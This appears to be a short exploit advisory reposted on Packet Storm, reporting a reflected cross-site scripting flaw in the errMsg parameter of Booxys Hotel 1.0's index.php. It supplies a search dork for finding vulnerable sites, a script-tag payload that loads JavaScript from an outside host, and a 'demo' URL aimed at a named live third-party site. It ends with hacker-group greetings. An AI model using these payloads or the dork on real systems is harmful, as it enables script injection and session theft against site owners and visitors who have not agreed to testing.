Booxys Hotel version 1.0 suffers from a cross site scripting vulnerability.
5f374c4110d195a7af4237b72a9fa066a7ba00a43e43a3263f74f30a78591a91#(+)Exploit Title: booxys Hotel [index.php] Cross site scripting Vulnerability
#(+)Author : Net.Edit0r
#(+)Software Link : http://www.booxys.com/
#(+) E-mail : Black.hat.tm@Gmail.com & Net.Edit0r@att.net
#(+) dork : inurl:"index.php?errMsg="
#(+) Versian : [1.0]
#(+) Category : Web Apps [XSS]
#(+) Platform : Tested on: linux
____________________________________________________________________
____________________________________________________________________
The security problem in the file "index.php" has been created. You
can disable this security problem Plagn take it away.
[~] Vulnerable File :
# [+]http://localhost.com/de/index.php?errMsg=[XSS]
[~] Cross-site scripting Vulnerability
# [+]/de/index.php?errMsg=[XSS]
# [+]http://localhost.com/de/index.php?errMsg=<SCRIPT/XSS
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
[~] Demo :
http://www.hotel-board.com/de/index.php?errMsg=<script>alert(1);</script>
____________________________________________________________________
____________________________________________________________________
########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)#BHG Member : & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ M4hd1 ~ Mikili ~ 4min
(+)Gr33ts to : Black-Hg.Org ~ Pentesters.ir & All Iranian HackerZ
########################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed